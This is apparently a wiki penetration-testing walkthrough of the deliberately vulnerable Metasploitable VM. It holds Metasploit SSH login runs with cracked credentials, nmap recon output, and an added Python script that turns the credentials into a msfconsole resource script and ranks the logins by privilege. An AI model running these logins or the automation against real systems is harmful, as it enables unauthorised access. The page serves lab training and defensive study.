[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.5:45812 -> 10.0.0.27:22) at 2016-03-26 17:23:11 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
More Credentials
Run each of the other credentials we found. Everything goes fine up until the last one, username klog:
msf auxiliary(ssh_login) > set USERNAME user
USERNAME => user
msf auxiliary(ssh_login) > set PASSWORD user
PASSWORD => user
msf auxiliary(ssh_login) > run
[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.0.5:50289 -> 10.0.0.27:22) at 2016-03-26 17:25:16 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME postgres
USERNAME => postgres
msf auxiliary(ssh_login) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(ssh_login) > run
[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.0.5:57606 -> 10.0.0.27:22) at 2016-03-26 17:25:25 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME service
USERNAME => service
msf auxiliary(ssh_login) > set PASSWORD service
PASSWORD => service
msf auxiliary(ssh_login) > run
[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'service:service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 4 opened (10.0.0.5:52395 -> 10.0.0.27:22) at 2016-03-26 17:25:36 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME sys
USERNAME => sys
msf auxiliary(ssh_login) > set PASSWORD batman
PASSWORD => batman
msf auxiliary(ssh_login) > run
[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'sys:batman' 'uid=3(sys) gid=3(sys) groups=3(sys) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 5 opened (10.0.0.5:34297 -> 10.0.0.27:22) at 2016-03-26 17:25:56 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME klog
USERNAME => klog
msf auxiliary(ssh_login) > set PASSWORD 123456789
PASSWORD => 123456789
msf auxiliary(ssh_login) > run
[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
[*] Command shell session 6 opened (10.0.0.5:47907 -> 10.0.0.27:22) at 2016-03-26 17:26:08 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 10.0.0.27 - Command shell session 6 closed.  Reason: Died from EOFError
msf auxiliary(ssh_login) >
That message tells us that the klog user doesn't have a home directory:
[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
Seeing the Creds
Once you've got some creds:
msf auxiliary(ssh_login) > creds

Credentials
===========

host       origin     service       public    private    realm  private_type
----       ------     -------       ------    -------    -----  ------------
10.0.0.27  10.0.0.27  22/tcp (ssh)  msfadmin  msfadmin          Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  user      user              Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  postgres  postgres          Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  service   service           Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  sys       batman            Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  klog      123456789         Password
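Running one set/run cycle per credential, as above, gets tedious and tells you nothing about which of the six logins is worth anything. The following is an added example, not code from the original page or from Metasploit, that covers the "More Credentials" and "Seeing the Creds" steps in one go: it converts the John results into the "username password" file that the ssh_login module's USERPASS_FILE option takes, emits a msfconsole resource script that tries every pair in a single run (the script layout is this example's own choice), and parses the module's Success lines to rank the logins by the groups they land in. The set of groups treated as privileged is an assumption for this example, and both embedded inputs are constructed excerpts of the output shown above.

```python
"""Batch the ssh_login run and rank what it found.

Added example, not code from the original page or from Metasploit.  Both
inputs below are constructed excerpts of the output shown on this page;
the resource-script layout and the list of privileged groups are
assumptions made for this example."""
import re

# Constructed input: the John the Ripper results listed on this page.
JOHN_RESULTS = """\
postgres (postgres)
user (user)
msfadmin (msfadmin)
service (service)
batman (sys)
123456789 (klog)
"""

# Constructed input: an excerpt of the ssh_login console output shown above.
SSH_LOGIN_OUTPUT = """\
[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.5:45812 -> 10.0.0.27:22) at 2016-03-26 17:23:11 -0700
[+] 10.0.0.27:22 SSH - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] 10.0.0.27:22 SSH - Success: 'sys:batman' 'uid=3(sys) gid=3(sys) groups=3(sys) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
[*] 10.0.0.27 - Command shell session 6 closed.  Reason: Died from EOFError
"""

JOHN_LINE = re.compile(r"^(\S+) \((\S+)\)$")                  # "password (username)"
SUCCESS = re.compile(r"^\[\+\] (\S+):(\d+) SSH - Success: '([^:']+):([^']*)' '(.*)'$")
GROUP_NAME = re.compile(r"\d+\(([^)]+)\)")                    # "112(admin)" -> admin

# Assumption for this example: groups that give more than an ordinary user's
# rights on a Debian/Ubuntu box of this vintage (admin is the sudo group on
# Ubuntu 8.04; adm can read the logs).  Adjust to the target's policy.
PRIVILEGED_GROUPS = {"root", "admin", "sudo", "wheel", "adm"}


def to_userpass(john_text):
    """'password (username)' lines -> 'username password' lines, the format
    that the USERPASS_FILE option of auxiliary/scanner/ssh/ssh_login reads.
    Passwords containing spaces are not handled by this simple pattern."""
    pairs = []
    for line in john_text.splitlines():
        m = JOHN_LINE.match(line.strip())
        if m:
            pairs.append(f"{m.group(2)} {m.group(1)}")
    return "\n".join(pairs) + "\n"


def resource_script(rhosts, userpass_path, workspace):
    """msfconsole resource script (layout assumed for this example) that runs
    ssh_login once over the whole list instead of one set/run per pair.
    Save it as a .rc file and start it with `msfconsole -r file.rc`."""
    return "\n".join([
        f"workspace -a {workspace}",
        f"workspace {workspace}",
        "use auxiliary/scanner/ssh/ssh_login",
        f"set RHOSTS {rhosts}",
        f"set USERPASS_FILE {userpass_path}",
        "set STOP_ON_SUCCESS false",     # keep going: we want every valid pair
        "run",
        "creds",
        "",
    ])


def parse_successes(output):
    """One record per '[+] ... Success:' line: host, port, user, password,
    uid, group names, whether any group is privileged, and whether the
    login had no home directory (the klog case on this page)."""
    records = []
    for line in output.splitlines():
        m = SUCCESS.match(line)
        if not m:
            continue
        host, port, user, password, banner = m.groups()
        uid_m = re.search(r"uid=(\d+)", banner)
        grp_m = re.search(r"groups=(\S+)", banner)
        groups = GROUP_NAME.findall(grp_m.group(1)) if grp_m else []
        records.append({
            "host": host,
            "port": int(port),
            "user": user,
            "password": password,
            "uid": int(uid_m.group(1)) if uid_m else None,
            "groups": groups,
            "privileged": bool(set(groups) & PRIVILEGED_GROUPS),
            "no_home": "Could not chdir to home directory" in banner,
        })
    # Privileged logins first, then by uid so system accounts sort ahead.
    records.sort(key=lambda r: (not r["privileged"], r["uid"] if r["uid"] is not None else 1 << 31))
    return records


if __name__ == "__main__":
    print(resource_script("10.0.0.27", "/root/box/metasploitable/userpass.txt", "metasploitable"))
    for r in parse_successes(SSH_LOGIN_OUTPUT):
        tag = "PRIV" if r["privileged"] else "    "
        print(f"{tag} {r['user']}:{r['password']} uid={r['uid']} groups={','.join(r['groups'])}")
```

On this page's data the ranking puts msfadmin first (member of admin and adm), which is the account to pivot from; user, service and sys are ordinary logins, and klog is a login with no home directory.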
Next step is getting some loot.
Usage Example: Metasploitable Virtual Box
Main page for Metasploitable virtual box: Metasploitable
As an example of how we can use metasploit, we'll be looking at the Metasploitable virtual box.
Setting Up Metasploitable
Downloaded the virtual disk image and loaded it up in a 64-bit Linux VirtualBox instance.
The networking configuration was: I had the VirtualBox instance running on a Mac, and was attacking from a machine running Kali Linux. Both computers were on a private network and on the same subnet.
From VirtualBox, I created a bridged network adapter (meaning, VirtualBox can send/receive messages directly through that interface). Next, I flipped the switch on the VirtualBox, and away we went. The router automatically assigned an IP address to the Metasploitable VirtualBox.
Recon
Let's take a few first steps in Metasploit, using the Metasploitable virtual box.
Make a record-keeping box for stuff:
$ mkdir -p box/metasploitable
Start by using nmap to scan the host.
First a fast scan with -F:
$ nmap -F 10.0.0.*
Then we can do a more extensive scan:
$ nmap -sS 10.0.0.*
This reveals the IP address of the VirtualBox, which is 10.0.0.27.
We can also do a deeper scan:
$ nmap -sS -sV -A 10.0.0.27
This will reveal an array of services, some of which may be exploitable using metasploit.
Sure enough, the verbose scan returns lots of good information:
$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info:
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT       ADDRESS
1   16.11 ms  10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
MySQL
Let's focus on the MySQL service:
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
We can brute-force MySQL, then use it to access files on the remote machine.
More info at Metasploitable/MySQL.
Wrapping Up and Moving On
After the nmap scan of the Metasploitable virtual box, we saw many services running, exposing this server's soft underbelly.
We began with MySQL. We were able to use Metasploit to brute-force the MySQL login. This was pretty trivial, since the password was blank.
Now that we've compromised the MySQL database, we've seen that there are several web services running - two instances of TikiWiki, an instance of Damn Vulnerable Web App, and information from/about owasp. The MySQL database gave us plenty of new attack vectors to dive into.
Flags
Metasploit - any and all resources related to Metasploit on this wiki
* Category:Metasploit - pages labeled with the "Metasploit" category label
* MSF/Wordlists - wordlists that come bundled with Metasploit
* MSFVenom - msfvenom is used to craft payloads
* Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload
Metasploitable: The Red Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
* Exploiting MySQL with Metasploit: Metasploitable/MySQL
* Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
* Exploiting VSFTP Backdoor: Metasploitable/VSFTP
* SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force
* SSH Penetration with Keys: Metasploitable/SSH/Keys
* SSH Penetration with Metasploit: Metasploitable/SSH/Exploits
* Brute-Forcing/Exploiting NFS: Metasploitable/NFS
* Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services:
* distcc: Metasploitable/distcc
Metasploitable Apache:
* Exploiting Apache (with Metasploit): Metasploitable/Apache
* Exploiting Apache (with Python): Metasploitable/Apache/Python
* Tor's Hammer DoS Attack: Metasploitable/TorsHammer
* Apache DAV: Metasploitable/Apache/DAV
* Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory:
* General approach to memory-based attacks: Metasploitable/Memory
* Investigating memory data: Metasploitable/Volatile Data Investigation
* Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Metasploitablue: The Blue Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions. Hence the name, Metasploita-blue.
Overview: Metasploitable/Defenses
* Metasploitable/Defenses/Stopping
* Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses:
* Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation
* Linux Artifact Investigation: Metasploitable/Artifact Investigation
* Linux Iptables Essentials: Metasploitable/Iptables
* Firewall Assurance and Testing: Metasploitable/Firewall
* Password Assessment: Metasploitable/Password Assessment
* Standard Unix Ports: Unix/Ports
* Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat
* Nmap (Blue Team): Metasploitable/Nmap
* Network Traffic Analysis: Metasploitable/Network Traffic Analysis
* Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns
* Snort IDS: Metasploitable/Snort